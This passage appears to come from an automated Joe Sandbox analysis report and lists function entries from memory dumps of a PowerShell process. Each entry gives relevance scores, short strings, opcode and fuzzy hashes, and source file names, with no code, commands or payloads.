API ID:
String ID: Xn{&
API String ID: 0-1936866235
Opcode ID: 2a384d55b3d4bbc57e5d232d7ad8d5ea2bcadb4b6db1b8a7d344593566cda597
Instruction ID: 6b3eb00c261cfdde7de13f078c2c031b2c10c1b9b2ee7c5c2cd36ccf072a5c47
Opcode Fuzzy Hash: 2a384d55b3d4bbc57e5d232d7ad8d5ea2bcadb4b6db1b8a7d344593566cda597
Instruction Fuzzy Hash: 21519E7180E7C54FC703AB6C99A55CABFB0AF07224B1A40D7C491DF263D6785949CBB2

Function 04C6BAF8 Relevance: 1.4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xn{&, xrefs: 04C6BB1D

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: Xn{&
API String ID: 0-1936866235
Opcode ID: 86999396de297b31c2b535669ea158dc1698db39115dc0b4b02a5f8559371ec0
Instruction ID: 401bb447e1378c91dd5806ab4b9550f4f33117ee6ecb2f08d03b42bb979c29ba
Opcode Fuzzy Hash: 86999396de297b31c2b535669ea158dc1698db39115dc0b4b02a5f8559371ec0
Instruction Fuzzy Hash: 4A612671E002189FCB14DFA9C584A8DFBF2FF88310F158169E819AB355EB75AD45CB60

Function 04C6BAE8 Relevance: 1.4, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xn{&, xrefs: 04C6BB1D

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: Xn{&
API String ID: 0-1936866235
Opcode ID: 47256f8dfb744a1be5c25570dcd6ee7c975e356ef953241fcb0e22c819556e6c
Instruction ID: 0bd453895d7b87c517c3fe57e9605560b0d7600373b7d7ed03fdc1fa05cd3fd6
Opcode Fuzzy Hash: 47256f8dfb744a1be5c25570dcd6ee7c975e356ef953241fcb0e22c819556e6c
Instruction Fuzzy Hash: 2B510671E002189FCB14DFA9D584A8DBBF6EF88310F18C069E819EB365EB75AD45CB50

Function 04C6E799 Relevance: 1.4, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

piUk, xrefs: 04C6E847

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: piUk
API String ID: 0-282173166
Opcode ID: a3aad5738013010e8725de34485c1f14d93b3f89d38af23ead5cffb73c9d3211
Instruction ID: 8099454c3f8c86df1de5e58b3779c16775fefc1b8625ef8e9e64ea498f62f9ed
Opcode Fuzzy Hash: a3aad5738013010e8725de34485c1f14d93b3f89d38af23ead5cffb73c9d3211
Instruction Fuzzy Hash: 8E41BC34E042059FCB18DFB9D59869DBBF2EF89304F10856AD01AAB3A5DB31AD05CB91

Function 04C6E7F0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

piUk, xrefs: 04C6E847

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: piUk
API String ID: 0-282173166
Opcode ID: 654bdd63ba29677bc11a5c980be74283602b69ab4bc18bf5f9f5ee2a895de5b4
Instruction ID: b6831325033413ff6819fe775cc4a130ccb745924336b1896a4b8e44c5c240d5
Opcode Fuzzy Hash: 654bdd63ba29677bc11a5c980be74283602b69ab4bc18bf5f9f5ee2a895de5b4
Instruction Fuzzy Hash: A241BC34A002058FCB15DF79D598A9DBBF2EF89304F14856AD41AAB396DB30AD05CBA1

Function 04C6AD60 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

am^, xrefs: 04C6AE67, 04C6AE6C

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: am^
API String ID: 0-3765412364
Opcode ID: 9460a25fcdd38efb18e8a24a38c680d099086d952fce0f4dc78668c5ed08dcdb
Instruction ID: bd470ac5df7f86dab08e16e087a8cc510413833a9486183a194856d469202720
Opcode Fuzzy Hash: 9460a25fcdd38efb18e8a24a38c680d099086d952fce0f4dc78668c5ed08dcdb
Instruction Fuzzy Hash: FE3192B8E002059FDB04EB74D898ABEBBB2EF85304F11C4A9C115AF395DA399D41CF61

Function 04C6E820 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

piUk, xrefs: 04C6E847

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: piUk
API String ID: 0-282173166
Opcode ID: 3d2343ce5969f6e1c7df2f14a48733e9592b0a0aa30172f2b403bef4c3879e75
Instruction ID: f5b8df1643c74b587c97c2ca41848cd738c6a92138e11f715650ba7ddb1aaa78
Opcode Fuzzy Hash: 3d2343ce5969f6e1c7df2f14a48733e9592b0a0aa30172f2b403bef4c3879e75
Instruction Fuzzy Hash: F4314734A002059FCB18DF69D594A9EBBF6FF88304F108529D41AAB395DB35AD45CBA0

Function 04C69428 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

Xn{&, xrefs: 04C69454

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: Xn{&
API String ID: 0-1936866235
Opcode ID: 5cffc22f26396e0e47dae4d442e6128ff606ce2a54ef8db38d56d2d1e2cad798
Instruction ID: 38f13617441a5dfc245d1c2cd29bd65cd1db08f517b882621b77cd715359c042
Opcode Fuzzy Hash: 5cffc22f26396e0e47dae4d442e6128ff606ce2a54ef8db38d56d2d1e2cad798
Instruction Fuzzy Hash: 79319FB49053448EDB60CF6AD08879AFFF3EF88310F28C15DD95E9B215DA74A441CB61

Function 04C6AD70 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

am^, xrefs: 04C6AE67, 04C6AE6C

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: am^
API String ID: 0-3765412364
Opcode ID: ca3d9483abf9d725c9f77bec8f00f93f183ebad9d65a5e00875cbbd897613377
Instruction ID: 1f37de62ced17d61a595d526a31e4cd3a3ad8283d0f53a85d1049a3e0dc3a218
Opcode Fuzzy Hash: ca3d9483abf9d725c9f77bec8f00f93f183ebad9d65a5e00875cbbd897613377
Instruction Fuzzy Hash: CC3146B8E002059FDB04EF64D494ABEBBB2EF84314F11C469D615AF394DA39DD418FA1

Function 04C69438 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

Xn{&, xrefs: 04C69454

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: Xn{&
API String ID: 0-1936866235
Opcode ID: b276b90ad755b789bce5c76d881d6d0fea2e0997ae737a84fed0ecf79335d258
Instruction ID: edc35e5d8d3aa33d455d27119f9f8d3d3b146702a7a01d3e9c369223192293d4
Opcode Fuzzy Hash: b276b90ad755b789bce5c76d881d6d0fea2e0997ae737a84fed0ecf79335d258
Instruction Fuzzy Hash: C4217CB4A053448EDB60CF6AC48839AFFF7EF88310F28C11DD95E97205D774A4818B61

Function 04C6F5A1 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

Xn{&, xrefs: 04C6F5BF

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: Xn{&
API String ID: 0-1936866235
Opcode ID: a09f938297be2724e746f56f4cf135153c9975f2ab88de0027bd66d3e3b7153f
Instruction ID: 049261d9e25746595e6fd4fa1ad4ef548e0b4bfd4424eebdbe2896213b624dd4
Opcode Fuzzy Hash: a09f938297be2724e746f56f4cf135153c9975f2ab88de0027bd66d3e3b7153f
Instruction Fuzzy Hash: 66012971D1075ADACB04CFE4D9945EDBBB6BF99300F20571EE016A6601EBB06A968B80

Function 04C6DE68 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

-m^, xrefs: 04C6DE9E

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: -m^
API String ID: 0-2566219803
Opcode ID: 54684bb32209e5054c21382790a4da9143ad5be8a75c66422bc899a34296e70b
Instruction ID: c728c073c4f68b88f6db88d514a53f1596a44f4283767109749b42ffd7e3241a
Opcode Fuzzy Hash: 54684bb32209e5054c21382790a4da9143ad5be8a75c66422bc899a34296e70b
Instruction Fuzzy Hash: 00F09E35B066505F8702422E6C508EFBFA7CEC6371304846FE05BCB211DA20A90583F2

Function 04C6F5B0 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

Xn{&, xrefs: 04C6F5BF

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: Xn{&
API String ID: 0-1936866235
Opcode ID: 7c016f58b95266c462202551d0135fb1b103105491063215118abb9aff5099e7
Instruction ID: 016970b71005942662265d7cf5c60295326911b8c69fdc4e0437e80038277362
Opcode Fuzzy Hash: 7c016f58b95266c462202551d0135fb1b103105491063215118abb9aff5099e7
Instruction Fuzzy Hash: F101E471D0075ADBCB04CFE4D9446EEBBB5FF99300F20572AE015A6600EBB06696CB80

Function 04C6DE78 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

-m^, xrefs: 04C6DE9E

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID: -m^
API String ID: 0-2566219803
Opcode ID: 32e61f51a835121451eb119e7577991717d50d3bfbadb70f06c4ffb741bc7b59
Instruction ID: 1fc12171c0b674a51f647515345d5063a40b3a52be5ac3fa23d5b79ea4adb391
Opcode Fuzzy Hash: 32e61f51a835121451eb119e7577991717d50d3bfbadb70f06c4ffb741bc7b59
Instruction Fuzzy Hash: F9E0C231740A144B8311A62EA91489FBBDBDFC8671300842EE02BCB300DE64ED0587E5

Function 079E2700 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d250ca8447fb5165b0b90f0c71d4de44c2744c9a86449e8a607243a8e96d90
Instruction ID: 4a1b6f78205961212801675a2c0bc3581acf4c88ba7c5e20c66645105499ea09
Opcode Fuzzy Hash: 18d250ca8447fb5165b0b90f0c71d4de44c2744c9a86449e8a607243a8e96d90
Instruction Fuzzy Hash: 04A15AB1B00206DFCB229BA8C94166ABBEDBF89314F1484BAE505DF351DB35DC45C7A1

Function 04C67600 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e4e9e8852a362e6540125eead7d4d03191c9efc531cc8cf1e498211be29704e
Instruction ID: 57df3ffc9f25195eb6da25e62248bad533533722cbd55af9cf340e6beccc0fda
Opcode Fuzzy Hash: 2e4e9e8852a362e6540125eead7d4d03191c9efc531cc8cf1e498211be29704e
Instruction Fuzzy Hash: 3D51B4353052159FD704DB79D884A6A7BE7EFC8218B1589A9E50ACB351EB35EC01CB60

Function 04C6E5F9 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138333528ab155a97baf704ab4f30dc8e90d873d6c51c792942933e4391d5d7b
Instruction ID: 5c97938d21570baed8efb7980f53ab5962f99bfe00b0c46a98b1020c0dcfac86
Opcode Fuzzy Hash: 138333528ab155a97baf704ab4f30dc8e90d873d6c51c792942933e4391d5d7b
Instruction Fuzzy Hash: F2514C787002058FCB10DF6DC69492ABBE2EFC8354B15C569E54ADF369EB38ED018B50

Function 04C6E608 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585f85f2fd49612db99f0a636a4d9c8ad8c5cc6d27a1012825144a9274f6b605
Instruction ID: dee24971b7d73e00a6884949766de07a015cfab96660d744a0b090625459caa7
Opcode Fuzzy Hash: 585f85f2fd49612db99f0a636a4d9c8ad8c5cc6d27a1012825144a9274f6b605
Instruction Fuzzy Hash: 41413D787002058FCB10DF6DC69492ABBE6EFC8354B15C569E546DF369EB38ED018BA0

Function 079E3CCF Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb31fa27976caec65ae13962a830477af664ed1bc2f038b2ec85ceffe362980
Instruction ID: f1aff136fb2bfc6b10c75bd9d789c5f195674f508d7c433b08b1cda05ce5f3ff
Opcode Fuzzy Hash: 7bb31fa27976caec65ae13962a830477af664ed1bc2f038b2ec85ceffe362980
Instruction Fuzzy Hash: E84108B0A10202DFDB328B69C5016767BAEAB85758F054999D9009F392D731ED89C7A1

Function 04C6C7C0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bade15f2a287a2cfea8490da796e7cd2236a1850217776d1396f5ad74c5be20
Instruction ID: d5e079a130dba85b1ba58243391ad0216cb901a7365a5c7a8688e00db3c6064b
Opcode Fuzzy Hash: 7bade15f2a287a2cfea8490da796e7cd2236a1850217776d1396f5ad74c5be20
Instruction Fuzzy Hash: 5C318D353002019FD715EB78E884A9ABBA6EFC4315F048539D60ACB366DF75E845CBA1

Function 04C6AE98 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f56e170e9f0822a899180f6e858372bf469e06a32e067cf78f5d20d1eb85103
Instruction ID: 8f7e1f21cd3c9126c56732706ba6fa88817ec089dd698902f2f84e4cc235c23a
Opcode Fuzzy Hash: 8f56e170e9f0822a899180f6e858372bf469e06a32e067cf78f5d20d1eb85103
Instruction Fuzzy Hash: 96318C70E002058FCB04DFA9D5947AEBBF7EF8A310F14C029E406EB765EA759C418B52

Function 04C6E229 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57df65f7711a4eff7aee9fb38c41710bb95f636db104b86390005518af3c62a1
Instruction ID: df8c9cc5e75e00c7717b5837d7c8351b6310bec9c1ae676913bef5c49c2fc00c
Opcode Fuzzy Hash: 57df65f7711a4eff7aee9fb38c41710bb95f636db104b86390005518af3c62a1
Instruction Fuzzy Hash: 49317E38B002058FCB18DF68D498AAEBBF2BF48314F148569D406EB394DB75AC85CF91

Function 04C6AEA8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf15bea8b47c7fc83faf4bfb2474bff83010acbd8e60053ffcb75d028c7cfa99
Instruction ID: 06ab295c4073263879d287bcf9b4ff4c7771470fd95729174e3736243e5e3ee7
Opcode Fuzzy Hash: bf15bea8b47c7fc83faf4bfb2474bff83010acbd8e60053ffcb75d028c7cfa99
Instruction Fuzzy Hash: 9C316B70A002098FDB04DFADC5947AEBAF7EF89350F14C029E406EB754EA759C418BA6

Function 04C672B9 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c2597e701ec00a63d5a60f3d0fb42c82ffcfda9e2323a714584d9b17675f55
Instruction ID: 8578dd9ea978b4cec713d8947300ea5e105368a78afdbe9851251ad51cceb129
Opcode Fuzzy Hash: 79c2597e701ec00a63d5a60f3d0fb42c82ffcfda9e2323a714584d9b17675f55
Instruction Fuzzy Hash: B6310B34B01205CFDB14DF68C598AADBBF2AF49719F1484A8E846EB365DB35ED41CB20

Function 04C6E238 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb1de96811c6c8e91840affdd206df33e6ee9905d27b14fa44e8d412947dab18
Instruction ID: 6d7965ccc9844cd118cd6b6cad0e9e97bf1200bf700c205902b98d907e963dc8
Opcode Fuzzy Hash: fb1de96811c6c8e91840affdd206df33e6ee9905d27b14fa44e8d412947dab18
Instruction Fuzzy Hash: 04314B34B002158FCB14DF69D498A9EBBF6FF88314F048529D406EB390DB75AC85CB91

Function 0332F3F0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751461672.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_332d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f801dcf7758c8529441e81befcdd9f3ca41d74c00897fbb860bb1a91d71227e4
Instruction ID: d5735abe61ffc8ed44e7cf3a1163cdc850b66bdebdb55fa07b7c9886f10d690b
Opcode Fuzzy Hash: f801dcf7758c8529441e81befcdd9f3ca41d74c00897fbb860bb1a91d71227e4
Instruction Fuzzy Hash: 38210371508200DFCB05DF24D9C4B26BF79FB88314F24C5ADE9094B256C376D496CBA1

Function 0332F044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751461672.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_332d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57c534f9bb370837004a0f0d999ee647c02d496698af3fd0a3d24e49625b1578
Instruction ID: 3602d96b05b1c438102658a270af4736fcc45399f0bd80b1b456b436837dfee5
Opcode Fuzzy Hash: 57c534f9bb370837004a0f0d999ee647c02d496698af3fd0a3d24e49625b1578
Instruction Fuzzy Hash: E5214671504204DFDB14DF24D9C0B26BFB9FB84714F24C6ADE8494B352C73AD846CA61

Function 04C67536 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c7a11999ae85239f970b76865b9a0555704935f7f49bb65becdaeb9e98d6c2
Instruction ID: f3e0e047c5b4c21ab290d2714581a482de2ddf29f570dfbfd11cc2d8b9c469b1
Opcode Fuzzy Hash: 94c7a11999ae85239f970b76865b9a0555704935f7f49bb65becdaeb9e98d6c2
Instruction Fuzzy Hash: 8011DA3AB00118CFCF04DBACD98099EBBF6EBCC255B0540A5E909EB365DB35ED158B90

Function 0332F3EB Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751461672.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_332d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
Instruction ID: e41c912fd3e04f1fa3eaca94cf31aebbddc086c625d33bb00cac14b9c0ef9aed
Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
Instruction Fuzzy Hash: 55219D76508240DFDB06CF50D9C4B16BF72FB48314F28C6AADD094A256C33AD46ACB91

Function 04C6BD18 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8741179e8261aa8770f84c339a16722d5f2de98d653b8107acac16654ddc66
Instruction ID: 3bbf54f9406cb38b220db716b754d29236a5760dbae5d12ee8360255c96bf7ff
Opcode Fuzzy Hash: ea8741179e8261aa8770f84c339a16722d5f2de98d653b8107acac16654ddc66
Instruction Fuzzy Hash: E111ED312087949FC718CB75D5A4A56BFF1EF46250B2884AEE08ECB6A2EB20FC45C700

Function 0332F03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751461672.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_332d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
Instruction ID: 2af74f6eadf66fcb77054e8bc199da206030cc27aa8f94c57433578d584bcac2
Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
Instruction Fuzzy Hash: BE11BB75504284CFDB15CF10D9C4B16BFB1FB84318F28C6AAD8494B656C73AD44ACF61

Function 04C67C8A Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c819d8c10763a560ad7fc634466468eb94900cef1db76d0af2274d0bb93783e7
Instruction ID: 7f4817158be732a36b73dcbb1c74c3947c9766d5062f7b3ffcb45ca8683c619a
Opcode Fuzzy Hash: c819d8c10763a560ad7fc634466468eb94900cef1db76d0af2274d0bb93783e7
Instruction Fuzzy Hash: 49017B317043445FCB10DF249C8497F7BE6EB89225710446DE00ECB301DA31AD018770

Function 04C6DEB9 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8782fa9fee138fd0ac654110c2bd80d03a8789c4cab6ea4cce9f822d2d40ac0e
Instruction ID: ff50a46f64a92782a9faa45cae99640943ed2ded3370bdb23bf3ed920941c91e
Opcode Fuzzy Hash: 8782fa9fee138fd0ac654110c2bd80d03a8789c4cab6ea4cce9f822d2d40ac0e
Instruction Fuzzy Hash: D1012835B081449BCB14DA78E8849ECBBB39BC8310F18C47ED517DB356EA31AD11DBA2

Function 04C6E078 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ede936488481828d899aba1614a4ce42f903a9fb77e3968967d8c85e05808b4c
Instruction ID: bbba04203c07db938778d941324be6cdaa36cd9e1405c066ad35401f7f400abf
Opcode Fuzzy Hash: ede936488481828d899aba1614a4ce42f903a9fb77e3968967d8c85e05808b4c
Instruction Fuzzy Hash: 21017135B00214DFCB119F75E948AAEBBF6FB89315F14406DE51AD3342DB32A911CB91

Function 04C6E1B0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd549bf1ee9cde643fcf236ad74de5a9f7261195c0297f3bb33606a1913de8a2
Instruction ID: 74932053cc6218ed683ab88a72f06456fdfcff4884b88471168fad0a4b21c315
Opcode Fuzzy Hash: dd549bf1ee9cde643fcf236ad74de5a9f7261195c0297f3bb33606a1913de8a2
Instruction Fuzzy Hash: 49110934204754CFC728DF75D48089AB7F6EF8931532089ADD48A87BA0DB32F845CB50

Function 04C6BFA8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751867954.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94ab46090888987e038a57d2c9864346cfe9753c565b13224d44f19d87ac3f5
Instruction ID: 562fcddfaba8ee08e1cceb906b92c1d2623fefbbd18c6eed817b1a74bed3e5dc
Opcode Fuzzy Hash: b94ab46090888987e038a57d2c9864346cfe9753c565b13224d44f19d87ac3f5
Instruction Fuzzy Hash: 5C01287270D3E14FD7054B6DA8D45B6BFE5EFA2212B0840EEE481CB262D765D904DB11

Function 0332D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1751461672.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_332d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9f637192b462eb223decaf488c514ebccd79996e8259b977b8ce91dfb5c672
